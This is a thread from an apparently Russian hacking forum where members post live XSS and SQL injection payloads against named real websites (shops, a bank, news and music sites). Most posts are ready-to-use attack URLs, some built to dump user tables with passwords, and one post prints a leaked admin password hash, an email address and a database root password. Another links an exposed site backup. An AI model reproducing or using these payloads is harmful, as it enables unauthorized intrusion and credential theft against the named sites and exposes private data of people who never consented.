Уязвимости SQLi, XSS и другие.

Discussion in 'Песочница' started by Егорыч+++, 10 May 2015.

  1. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    Ссылка:eek:nlinetrade.ru
    Тип: Полу-активная,действует некоторое время,потом надо снова вбивать урл со скриптом .

    Code:
    www.onlinetrade.ru/member/login?url=%2522%253E%253Cscript%253Ealert()%253C%2fscript%253E&c=399581"><script>alert("WH")</script>> 
     
  2. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    Ссылка: patee.ru
    Тип:XSS-Reflected
    Code:
    "><script>alert("WH")</script>
    Регистрируемся,создаем рецепт
    Вбиваем в "Названии блюда" "Описание блюда" скрипт и ещё в "Стадия приготовления"
    Там где число пропорции пишем любое число(только не сильно большое)
    "Время приготовления в минутах " так же .
    Не забудьте добавить ингредиенты(!),любые на рандом(я выбирал 4 штуки) .
    После отправляем и видим XSS-Reflected .
     
  3. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    887
    Reputations:
    363
    разберитесь с определениями.
     
    _________________________
  4. tipa_cracker

    tipa_cracker New Member

    Joined:
    15 Sep 2015
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
  5. DDShadoww

    DDShadoww New Member

    Joined:
    14 Jul 2015
    Messages:
    11
    Likes Received:
    4
    Reputations:
    2
    Target: alfa.com.tw
    Type: XSS Reflected

    Code:
    http://www.alfa.com.tw/search.php?keyword="><script>alert(1)</script>
    А для Safari, Chrome работает iframe если будет присутствовать закрывающий тэг.
     
  6. Filipp

    Filipp Member

    Joined:
    10 May 2015
    Messages:
    246
    Likes Received:
    56
    Reputations:
    31
    XSS-reflected:
    Code:
    www.topglobus.ru/sachy/ridici/sachy-hra2.php?id=4181471&pozz=4'%22()%26%25<acx><ScRiPt%20>prompt(935766)</ScRiPt>
     
  7. joelblack

    joelblack Reservists Of Antichat

    Joined:
    6 Jul 2015
    Messages:
    228
    Likes Received:
    389
    Reputations:
    105
    target: http://www.unifinbank.ru/
    type: XSS Reflected

    Строка поиска:
    Code:
    "><script>alert('hello')</script>
     
  8. R3hab

    R3hab Member

    Joined:
    17 May 2015
    Messages:
    117
    Likes Received:
    9
    Reputations:
    6
    STREIT Group - Armored Cars Manufacturer
    HTML:
    http://www.armored-cars.com/vehicle/view_add.php?vid=-7%20/*!50000union*/%20distinct%20select%201,2,3,4,5,version(),7,8,9
    ТИЦ 30
    PR 3
    AR 969,040

    5.5.42-MariaDB-cll-lve

    Make Free Bitcoin
    HTML:
    http://www.makefreebitco.in/news.php?id=-5'%20/*!50000union*/%20distinct%20select%201,version(),3,4--+f

    AR 149,492
    5.5.42-37.1

    Трафф 140K

    SMS PARIAZ - Accueil
    Joomla кому надо,добьет
    HTML:
    http://www.smspariaz.com/race/turf2.php?mid=-7%20union%20select%201,2,version(),4,5,6,7,8,9,10,11,12--+f

    PR 2
    AR 322,679
    5.6.23
    Трафф 120K

     
    #188 R3hab, 22 Sep 2015
    Last edited: 22 Sep 2015
    SaNDER likes this.
  9. DDShadoww

    DDShadoww New Member

    Joined:
    14 Jul 2015
    Messages:
    11
    Likes Received:
    4
    Reputations:
    2
    Target: 220-volt.ru
    Type: XSS Reflected

    Code:
    www.220-volt.ru/search/?q=</script><script>confirm(1)</script>
     
  10. tipa_cracker

    tipa_cracker New Member

    Joined:
    15 Sep 2015
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Мне кажется что тут ( http://www.girlplays.ru/ ) уязвимости в поисковике 0 ...
     
  11. ocheretko

    ocheretko Banned

    Joined:
    15 May 2010
    Messages:
    151
    Likes Received:
    51
    Reputations:
    116
    Так и есть.
    Code:
    $P$BVX.b8gaC9KdVELsexne9KZawfO70G0 | admin  | rusakov1971@inbox.ru
    
      Method: POST
      Type: UNION query
      Title: MySQL UNION query (random number) - 7 columns
      Payload: search=-8718') UNION ALL SELECT CONCAT(0x717a707171,0x7a507250687641477a52,0x7170626a71),1342,1342,1342,1342,1342,1342#&submit_s=
    Code:
    define('DB_USER', 'root');
    define('DB_PASSWORD', '89039486893');
    define('DB_HOST', 'localhost');
    
     
    #191 ocheretko, 25 Sep 2015
    Last edited: 25 Sep 2015
  12. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    Target:
    Code:
    _ttp://good-steam.ru/backup.zip . 
    .
    Type:Backup .
     
    #192 SaNDER, 29 Sep 2015
    Last edited: 3 Oct 2015
  13. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    Target:salrium.ru
    Type : XSS - Reflected .
    Code:
    salrium.ru/resp_block.php?id_goods=1728083"><script>alert("WH")</script>
    или вот так 
    http://salrium.ru/resp_block.php?id_goods=1728083%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28908717%29%3C/ScRiPt%3E&page=2 .
    Можно и так salrium.ru/resp_block.php?id_goods="><script>alert("WH")</script>
     
  14. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    Target:_ttp://steam-extra.ru/listing.php?category_id=40049
    Type:XSS-Reflected
    Code:
    "><script>alert("WH")</script>
    или
    Code:
    '"()&%<acx><ScRiPt >prompt(916773)</ScRiPt>
    Или свой .
     
    #194 SaNDER, 29 Sep 2015
    Last edited: 3 Oct 2015
  15. zigen

    zigen New Member

    Joined:
    25 May 2015
    Messages:
    4
    Likes Received:
    0
    Reputations:
    1
    Target: http://www.archetype.co.uk/search.php
    Type:XSS-Reflected
    Code:
    "><script>alert("OOPS")</script>


    Но там кажется можно еще и SQLi раскрутить, ошибка по строкой поиска
     
  16. AlexG

    AlexG Member

    Joined:
    26 Sep 2015
    Messages:
    58
    Likes Received:
    12
    Reputations:
    5
    Вы правы:

    Target: archetype.co.uk
    Type:SQLi error based
    Exploit:
    Code:
    Get: http://www.archetype.co.uk/search.php
    Post-data: search=123" and extractvalue(0x0a,concat(0x0a,(select concat(version(),0x3a,database(),0x3a,current_user)))) and 1="1 -- &submit.x=91&submit.y=9&status[]=Recent&status[]=Current&status[]=Forthcoming
    
    DB-name: archetyp_db
    DB-user: archetype
    Version: 5.1.73-cll
    P.S. Возможно есть более изящное решение, но у меня получилось так :)

    UPD Поковыряв руками выяснилось, что пассы в мд5 и в вывод тупо не влазят (ограничение способа в 31 символ). Нашел такое решение (лимит 64 символа):
    Code:
    Get: http://www.archetype.co.uk/search.php
    Post-data: search=123" and (select 1 from (Select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y) x) and 1="1 -- &submit.x=91&submit.y=9&status[]=Recent&status[]=Current&status[]=Forthcoming
    
     
    #196 AlexG, 6 Oct 2015
    Last edited: 9 Oct 2015
  17. ubepkr

    ubepkr Member

    Joined:
    17 Aug 2015
    Messages:
    96
    Likes Received:
    20
    Reputations:
    1
    Target: http://www.gaspforair.org
    Уязвимость:SQLi
    Code:
    http://www.gaspforair.org/gasp/gedc/artcl-new.php?ID=115 +UNION+ALL+SELECT+1,(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(housing_user)WHERE(@x)IN(@x:=CONCAT(0x20,@x,userlevel,0x3a,username,0x3a,password,0x3c62723e))))x),3,4,5--
    Target: http://www.sequentialtart.com
    Уязвимость:SQLi
    Code:
    http://www.sequentialtart.com/article.php?id=-445+UNION+ALL+SELECT+1,2,3,4,(SELECT(@x)FROM(SELECT(@x:=0x00),(SELECT(@x)FROM(seqtartprod.IPM_users)WHERE(@x)IN(@x:=CONCAT(0x20,@x,username,0x3a,password,0x3a,email,0x3c62723e))))x),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
    Вот прогнал последнюю DirB'ом, удивился: http://www.sequentialtart.com/.bash_history и http://www.sequentialtart.com/.mysql_history
    чО уж там, /etc/shadow надо в общий доступ!)))


    Добавлю:
    Target: http://yrmusic.com
    Уязвимость:SQLi
    Code:
    http://yrmusic.com/v2/artists/bios/artist.php?ID=-84+UNION+ALL+SELECT+1,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
    Target: http:http://www.zam.it
    Уязвимость:SQLi
    Code:
    http://www.zam.it/home.php?id_autore=234 +UNION+ALL+SELECT+1,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3,4,5,6,7,8,9,10 --
    Оффтоп про вышеуказанный адрес: параллельно с Лисой (хакбар с Диосами), то ли с бодуна, то ли просто от лени, запустил Havij. Дык вот (это не первое наблюдение), он, не поверите, врет)) Не верьте Havij'у ибо он утверждает, что здесь 2 таблицы, а на самом деле, их 10)) Попробуйте последний адрес через запрос и через сию программулину))

    Target: http:http://sh.newsun.dk
    Уязвимость:SQLi
    Code:
    http://sh.newsun.dk/vis.php?id=189+UNION+ALL+SELECT+1,2,3,4,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),6,7,8--
     
    #197 ubepkr, 13 Oct 2015
    Last edited: 13 Oct 2015
  18. R3hab

    R3hab Member

    Joined:
    17 May 2015
    Messages:
    117
    Likes Received:
    9
    Reputations:
    6
    DUS Architects Amsterdam
    Type:SQLi

    HTML:
    http://www.dusarchitects.com/news.php?newsid=-8%27%20union%20select%201,2,3,version(),5,6,7--+f
    ТИЦ 20
    PR 5

    5.6.23-LOG
     
  19. DDShadoww

    DDShadoww New Member

    Joined:
    14 Jul 2015
    Messages:
    11
    Likes Received:
    4
    Reputations:
    2
    Target: http://motivtelecom.ru
    Type: XSS Reflected

    Code:
    motivtelecom.ru/sverdlovsk-oblast/search?search_text="><script>alert(1)<%2Fscript>
     
  20. R3hab

    R3hab Member

    Joined:
    17 May 2015
    Messages:
    117
    Likes Received:
    9
    Reputations:
    6
    YogaBugs
    Type : SQLi
    HTML:
    http://www.yogabugs.com/shop_item.php?id=-3%20union%20select%201,2,version(),4,5,6,7,8,9,10,11--+f
    PR 3
    5.5.44-0ubuntu0.14.04.1
     
Loading...